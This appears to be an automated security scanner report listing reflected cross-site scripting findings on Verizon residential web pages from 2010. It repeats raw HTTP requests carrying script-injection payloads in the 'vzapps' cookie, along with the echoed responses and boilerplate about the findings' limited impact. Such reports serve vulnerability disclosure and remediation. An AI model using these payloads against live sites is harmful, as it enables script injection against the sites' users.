GET /Residential/Services/SecuritySuite/SecuritySuite.htm HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TX7daef'><script>alert(1)</script>c934f3f7b2c; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
Response
HTTP/1.0 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 64651 Expires: Sat, 20 Nov 2010 00:16:17 GMT Cache-Control: max-age=0, no-cache, no-store Date: Sat, 20 Nov 2010 00:16:17 GMT Connection: close Set-Cookie: ContextInfo_State=TX7daef'><script>alert(1)</script>c934f3f7b2c; path=/
<html xmlns:vz> <head id="_ctl0_head"><title> Verizon | Essential Services: Internet Security Suite </title><meta name="keywords" description="anti-virus, firewall, anti-spyware, internet parent ...[SNIP]... <input type='hidden' id='locationInfo' value='TX7DAEF'><SCRIPT>ALERT(1)</SCRIPT>C934F3F7B2C ' /> ...[SNIP]...
The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c5db1'><script>alert(1)</script>7ef783c9f97 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/Services/TechnicalSupport/TechnicalSupport.htm HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TXc5db1'><script>alert(1)</script>7ef783c9f97; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
Response
HTTP/1.0 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 60724 Expires: Sat, 20 Nov 2010 00:16:16 GMT Cache-Control: max-age=0, no-cache, no-store Date: Sat, 20 Nov 2010 00:16:16 GMT Connection: close Set-Cookie: ContextInfo_State=TXc5db1'><script>alert(1)</script>7ef783c9f97; path=/
The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8fc1d'><script>alert(1)</script>57067391278 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/TV/ HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TX8fc1d'><script>alert(1)</script>57067391278; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
Response
HTTP/1.0 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 76231 Expires: Sat, 20 Nov 2010 00:11:46 GMT Cache-Control: max-age=0, no-cache, no-store Date: Sat, 20 Nov 2010 00:11:46 GMT Connection: close Set-Cookie: ContextInfo_State=TX8fc1d'><script>alert(1)</script>57067391278; path=/ Set-Cookie: ContextInfo_LoopQual=; path=/
<html xmlns:vz> <head id="_ctl0_head"><title> Verizon | FIOS TV + HD TV Service </title><meta name="keywords" content="video on demand, vod, premium cable tv, cable service, cable internet, dsl ...[SNIP]... <input type='hidden' id='locationInfo' value='TX8FC1D'><SCRIPT>ALERT(1)</SCRIPT>57067391278 ' /> ...[SNIP]...
The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 6c93f<script>alert(1)</script>ad59696c099 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/TV/ HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TX6c93f<script>alert(1)</script>ad59696c099; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
Response
HTTP/1.0 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 74630 Expires: Sat, 20 Nov 2010 00:12:07 GMT Cache-Control: max-age=0, no-cache, no-store Date: Sat, 20 Nov 2010 00:12:07 GMT Connection: close Set-Cookie: ContextInfo_State=TX6c93f<script>alert(1)</script>ad59696c099; path=/ Set-Cookie: ContextInfo_LoopQual=; path=/
<html xmlns:vz> <head id="_ctl0_head"><title> Verizon | FIOS TV + HD TV Service </title><meta name="keywords" content="video on demand, vod, premium cable tv, cable service, cable internet, dsl ...[SNIP]... <DIV style="FLOAT: left" id=yourlocation>TX6C93F<SCRIPT>ALERT(1)</SCRIPT>AD59696C099 </DIV> ...[SNIP]...
The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload c1b7b<script>alert(1)</script>28eee026df0 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/WiFi/ HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TXc1b7b<script>alert(1)</script>28eee026df0; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
Response
HTTP/1.0 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 63717 Expires: Sat, 20 Nov 2010 00:12:26 GMT Cache-Control: max-age=0, no-cache, no-store Date: Sat, 20 Nov 2010 00:12:26 GMT Connection: close Set-Cookie: ContextInfo_State=TXc1b7b<script>alert(1)</script>28eee026df0; path=/
<html xmlns:vz> <head id="_ctl0_head"><title> Verizon | Internet | Wi-Fi </title><meta name="keywords" content="verizon internet services, verizon internet products, verizon wi-fi, ISP, internet ...[SNIP]... <DIV style="FLOAT: left" id=yourlocation>TXC1B7B<SCRIPT>ALERT(1)</SCRIPT>28EEE026DF0 </DIV> ...[SNIP]...
The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 63a3c'><script>alert(1)</script>03a48b9a52e was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/WiFi/ HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TX63a3c'><script>alert(1)</script>03a48b9a52e; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
Response
HTTP/1.0 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 63721 Expires: Sat, 20 Nov 2010 00:12:11 GMT Cache-Control: max-age=0, no-cache, no-store Date: Sat, 20 Nov 2010 00:12:11 GMT Connection: close Set-Cookie: ContextInfo_State=TX63a3c'><script>alert(1)</script>03a48b9a52e; path=/
<html xmlns:vz> <head id="_ctl0_head"><title> Verizon | Internet | Wi-Fi </title><meta name="keywords" content="verizon internet services, verizon internet products, verizon wi-fi, ISP, internet ...[SNIP]... <input type='hidden' id='locationInfo' value='TX63A3C'><SCRIPT>ALERT(1)</SCRIPT>03A48B9A52E ' /> ...[SNIP]...
The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 5782f<script>alert(1)</script>042ef7a5b1d was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/WiFi/HowToGetIt HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TX5782f<script>alert(1)</script>042ef7a5b1d; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
Response
HTTP/1.0 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 65807 Expires: Sat, 20 Nov 2010 00:11:42 GMT Cache-Control: max-age=0, no-cache, no-store Date: Sat, 20 Nov 2010 00:11:42 GMT Connection: close Set-Cookie: ContextInfo_State=TX5782f<script>alert(1)</script>042ef7a5b1d; path=/
<html xmlns:vz> <head id="_ctl0_head"><title> Verizon | Internet | Wi-Fi: How to Get It </title><meta name="keywords" content="verizon internet services, verizon internet products, verizon wi-fi ...[SNIP]... <DIV style="FLOAT: left" id=yourlocation>TX5782F<SCRIPT>ALERT(1)</SCRIPT>042EF7A5B1D </DIV> ...[SNIP]...
The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9067c'><script>alert(1)</script>8e4bfe5a6f4 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/WiFi/HowToGetIt HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TX9067c'><script>alert(1)</script>8e4bfe5a6f4; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
Response
HTTP/1.0 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 65811 Expires: Sat, 20 Nov 2010 00:11:37 GMT Cache-Control: max-age=0, no-cache, no-store Date: Sat, 20 Nov 2010 00:11:37 GMT Connection: close Set-Cookie: ContextInfo_State=TX9067c'><script>alert(1)</script>8e4bfe5a6f4; path=/
<html xmlns:vz> <head id="_ctl0_head"><title> Verizon | Internet | Wi-Fi: How to Get It </title><meta name="keywords" content="verizon internet services, verizon internet products, verizon wi-fi ...[SNIP]... <input type='hidden' id='locationInfo' value='TX9067C'><SCRIPT>ALERT(1)</SCRIPT>8E4BFE5A6F4 ' /> ...[SNIP]...
The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b381b'><script>alert(1)</script>ce796c23fc was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/aboutFiOS/Overview.htm HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TXb381b'><script>alert(1)</script>ce796c23fc; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload cb6db<script>alert(1)</script>2abfc7b8635 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/aboutFiOS/Overview.htm HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TXcb6db<script>alert(1)</script>2abfc7b8635; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 3e936<script>alert(1)</script>c5abaf729ed was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/aboutFiOS/labs/labs.htm HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TX3e936<script>alert(1)</script>c5abaf729ed; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ab065'><script>alert(1)</script>e9047e9551f was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/aboutFiOS/labs/labs.htm HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TXab065'><script>alert(1)</script>e9047e9551f; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload dd3b4<script>alert(1)</script>757b9633f3c was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/aboutFiOS/reviews/reviews.htm HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TXdd3b4<script>alert(1)</script>757b9633f3c; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 26326'><script>alert(1)</script>0d04466e0c9 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/aboutFiOS/reviews/reviews.htm HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TX26326'><script>alert(1)</script>0d04466e0c9; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a49de'><script>alert(1)</script>ec31fe281d2 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/aboutFiOS/widgets/widgets.htm HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TXa49de'><script>alert(1)</script>ec31fe281d2; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 202c8<script>alert(1)</script>a033bcd02b5 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/aboutFiOS/widgets/widgets.htm HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TX202c8<script>alert(1)</script>a033bcd02b5; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c8020'><script>alert(1)</script>7e15a2d3a4 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /residential/bundles/bundlesoverview/bundlesoverview.htm HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TXc8020'><script>alert(1)</script>7e15a2d3a4; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 4afcd<script>alert(1)</script>f5636ef73be was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
